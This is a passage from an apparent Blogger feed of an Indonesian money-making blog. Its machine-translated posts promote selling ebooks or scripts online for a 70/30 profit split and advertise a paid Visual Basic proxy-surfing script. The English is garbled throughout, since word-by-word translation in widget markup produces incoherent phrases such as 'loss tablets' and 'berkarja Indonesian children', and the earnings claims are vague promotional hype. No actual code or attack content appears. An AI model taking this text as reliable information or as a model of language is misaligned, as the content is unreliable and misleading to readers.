&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;has&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;no&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;use&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;paypal&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;something&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;so&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;difficult for&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;us&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;doing business&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the internet&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;only&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;real&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;directly&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;real&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pay&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;longer&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;if&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;trouble&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;finding&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on the internet&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;should&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a lot of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;with through the&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;internet  business&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;yet&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;do not&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;have&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;too&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;much&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to and fro&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;enough to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;let&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;party&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;author&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;provides an  easy&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to  establish&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;participation&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;the product&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;ebook&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;script&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;selling&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;here&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;do not&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;need to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;create&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a website&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;enough to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;have capital&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ready to&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;be a&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ebook&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;script&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;be sent&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;via&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;email&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;disk&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;virtual&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;banks&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;have&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;any&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;yahoo&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;be achieved&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;berkarja&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Indonesian&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;children&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on the internet&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;make lots of money&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;loss&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;tablets&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;if&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Traffic&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;only&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;distributed&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;for free&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps atn"&gt;non-&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;formally&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;better&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;just&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that the&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;science&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the work&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;always&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-5071043197664612669?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/5071043197664612669/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/bisnis-tanpa-blog-dan-website-terbukti.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5071043197664612669'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5071043197664612669'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/bisnis-tanpa-blog-dan-website-terbukti.html' title='bisnis tanpa blog dan website terbukti'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-874307356891986475</id><published>2011-01-19T19:37:00.000-08:00</published><updated>2011-01-19T20:03:02.224-08:00</updated><title type='text'>di jual script suft proxy vb</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_nLUUYT3afN4/TTexYagWphI/AAAAAAAAAC8/qkufU0ACA4Y/s1600/ebook%2BWSP.png"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 320px; height: 333px;" src="http://1.bp.blogspot.com/_nLUUYT3afN4/TTexYagWphI/AAAAAAAAAC8/qkufU0ACA4Y/s200/ebook%2BWSP.png" alt="" id="BLOGGER_PHOTO_ID_5564110897629537810" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family: arial;" id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;has&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;opened&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;new opportunities&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;for&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;those of you who&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;want to earn&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;money&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;work&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;does not&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;target&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;any&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;job&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;one of them&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;get a&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;part&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;-time&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;job opportunities&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;receive&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;various&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;forms of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ebook&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;script&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;anything that could&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;great advantage&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;not&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;only that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;can&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;sell&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;without having&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ebay&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Amazon&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;or&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;other&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;sites&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;are cut off&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;between the&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;profit-sharing&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;different&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;here&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;if&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your product is&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;sold&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;80&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;%&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;of&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;the total&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;target&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;set&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;will be&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;willing to pay&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;70&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;%&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;owned&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;all&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;30&lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif"&gt;%&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;belong to&lt;/span&gt; &lt;span style="font-weight: bold;" title="Klik untuk  terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;ya&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;one&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;of the products&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;owned by&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dear&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;friends&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;who&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;wanted to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;be traded&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;through&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a collection of&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;tips&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and tricks&lt;/span&gt; &lt;span style="font-weight: bold;" title="Klik untuk terjemahan alternatif" class="hps"&gt;software&lt;/span&gt;&lt;span style="font-weight: bold;" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span style="font-weight: bold;" title="Klik  untuk terjemahan alternatif" class="hps"&gt;marketing&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;, &lt;/span&gt;&lt;span style="font-weight: bold;" title="Klik  untuk terjemahan alternatif" class="hps"&gt;handware&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span style="font-weight: bold;" title="Klik  untuk terjemahan alternatif" class="hps"&gt;1000trik.blogspot.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;&lt;span style="font-family:arial;"&gt;You&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;want to&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;search&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the web&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;site&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;suft&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;by&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;proxy&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;here&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;using&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;visual&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;basic&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;script&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;can&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;be obtained&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;,&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;but&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the script&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;is&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;not&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;free&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;but&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;you&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;must&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;buy&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;,&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;quite&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;why&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;only &lt;span style="font-weight: bold;"&gt;100,000&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;ribu rupiah&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;,&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;you&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;create&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;what&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;is&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;quite&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;the languages&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;in&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;use&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;visual&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;basic&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;not&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;too&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;difficult&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;for&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;other&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;languages&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif"  style="font-family:arial;"&gt;,&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"  style="font-family:arial;"&gt;what else&lt;/span&gt;&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"  